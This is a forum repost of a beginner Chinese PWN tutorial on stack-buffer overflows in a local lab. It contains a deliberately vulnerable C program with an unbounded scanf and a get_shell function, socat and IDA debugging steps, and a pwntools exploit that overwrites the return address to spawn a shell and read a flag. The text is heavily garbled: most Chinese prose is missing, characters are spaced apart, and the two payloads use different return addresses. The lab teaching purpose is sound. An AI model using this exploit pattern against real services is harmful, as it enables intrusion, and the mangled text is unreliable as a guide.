[16128] 2020-11-24_第一个PWN:栈溢出原理以及EXP的编写

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-11-24_第一个PWN:栈溢出原理以及EXP的编写 P W N E X P A T L   F r e e B u f   2 0 2 0 - 1 1 - 2 4 P W N C e n t O S   6 . 8   3 2 b i t g c c s o c a t 宿 宿 I D A 7 . 0   P y t h o n   +   p w n t o o l s 宿 I D A c e n t O S c e n t O S s e r v i c e   i p t a b l e s   s t o p P W N 便 p w n t o o l s C 使 C b u f b u f 6 4 H e l l o   W o r l d / / s t a c k _ o v e r f l o w . c # i n c l u d e   < s t d i o . h > / /   v o i d   s t a c k _ o v e r f l o w ( ) {                 c h a r   b u f [ 6 4 ]   =   { 0 } ;                 s c a n f ( " % s " ,   & b u f ) ;   / / b u f                 p r i n t f ( " H e l l o   % s n " ,   & b u f ) ;   / / b u f } / /   便 v o i d   g e t _ s h e l l ( ) {                 s y s t e m ( " / b i n / s h " ) ; } / /   v o i d   m a i n ( ) {                 s t a c k _ o v e r f l o w ( ) ; } s c a n f ( )
w i k i 宿 I D A I D A s t a c k _ o v e r f l o w I D A l i n u x _ s e r v e r c e n t O S I D A   D e b u g g e r     S e l e c t   d e b u g g e r R e m o t e   L i n u x   d e b u g g e r O K D e b u g g e r   P r o c e s s   o p t i o n s H o s t n a m e c e n t O S I P P o r t 2 3 9 4 6 F 9 [ r o o t @ l o c a l h o s t   p w n ] #   g c c   s t a c k _ o v e r f l o w . c   - o   s t a c k _ o v e r f l o w [ r o o t @ l o c a l h o s t   p w n ] #   . / s t a c k _ o v e r f l o w   s t a c k _ o v e r f l o w H e l l o   s t a c k _ o v e r f l o w [ r o o t @ l o c a l h o s t   p w n ] #   . / l i n u x _ s e r v e r   I D A   L i n u x   3 2 - b i t   r e m o t e   d e b u g   s e r v e r ( S T )   v 1 . 2 2 .   H e x - R a y s   ( c )   2 0 0 4 - 2 0 1 7 L i s t e n i n g   o n   0 . 0 . 0 . 0 : 2 3 9 4 6 . . . A A A A A A
b u f 0 x 4 C 使 p w n t o o l s c e n t O S 使 s o c a t 9 9 9 9 [ r o o t @ l o c a l h o s t   p w n ] #   s o c a t   t c p - l i s t e n : 9 9 9 9 , r e u s e a d d r , f o r k   E X E C : . / s t a c k _ o v e r f l o w , p t y , r a w , e c h o = 0 p w n t o o l s s t a c k _ o v e r f l o w I D A s c a n f D e b u g g e r     A t t a c h   t o   p r o c e s s s t a c k _ o v e r f l o w O K F 9 P y t h o n s e n d l i n e ( ) 0 x B F 8 C 1 7 B C - 0 x B F 8 C 1 7 7 0 0 x 4 C [ r o o t @ l o c a l h o s t   p w n ] #   s o c a t   t c p - l i s t e n : 9 9 9 9 , r e u s e a d d r , f o r k   E X E C : . / s t a c k _ o v e r f l o w , p t y , r a w , e c h o = 0     ~   p y t h o n 3 P y t h o n   3 . 7 . 4   ( d e f a u l t ,   S e p     7   2 0 1 9 ,   1 7 : 4 6 : 2 8 ) [ C l a n g   1 0 . 0 . 1   ( c l a n g - 1 0 0 1 . 0 . 4 6 . 4 ) ]   o n   d a r w i n T y p e   " h e l p " ,   " c o p y r i g h t " ,   " c r e d i t s "   o r   " l i c e n s e "   f o r   m o r e   i n f o r m a t i o n . > > >   f r o m   p w n   i m p o r t   * > > >   i o   =   r e m o t e ( ' 1 7 2 . 1 6 . 1 7 7 . 1 3 4 ' ,   9 9 9 9 ) [ x ]   O p e n i n g   c o n n e c t i o n   t o   1 7 2 . 1 6 . 1 7 7 . 1 3 4   o n   p o r t   9 9 9 9 [ x ]   O p e n i n g   c o n n e c t i o n   t o   1 7 2 . 1 6 . 1 7 7 . 1 3 4   o n   p o r t   9 9 9 9 :   T r y i n g   1 7 2 . 1 6 . 1 7 7 . 1 3 4 [ + ]   O p e n i n g   c o n n e c t i o n   t o   1 7 2 . 1 6 . 1 7 7 . 1 3 4   o n   p o r t   9 9 9 9 :   D o n e > > >   p a y l o a d   =   b ' A ' * 0 x 4 c   +   p 3 2 ( 0 x 0 8 0 4 8 4 8 e ) > > >   i o . s e n d ( p a y l o a d ) > > >   i o . s e n d ( ' n ' )
I D A r e t n g e t _ s h e l l ( ) 使 p w n t o o l s f l a g . t x t i o . c l o s e ( ) s t a c k _ o v e r f l o w E X P E X P F 9 : ) > > >   i o . i n t e r a c t i v e ( ) [ * ]   S w i t c h i n g   t o   i n t e r a c t i v e   m o d e H e l l o   A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A l s f l a g . t x t     l i n u x _ s e r v e r         s t a c k _ o v e r f l o w         s t a c k _ o v e r f l o w . c c a t   f l a g . t x t f l a g { Y 0 u _ W i n _ b y _ A T L _ T E A M } # ! / u s r / b i n / e n v   p y t h o n 3 #   - * -   c o d i n g :   u t f - 8   - * - f r o m   p w n   i m p o r t   * i o   =   r e m o t e ( ' 1 7 2 . 1 6 . 1 7 7 . 1 3 4 ' ,   9 9 9 9 ) p a y l o a d   =   b ' A ' * 0 x 4 C   +   p 3 2 ( 0 x 0 8 0 4 8 4 7 5 ) i o . s e n d l i n e ( p a y l o a d ) i o . i n t e r a c t i v e ( ) i o . c l o s e ( )

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则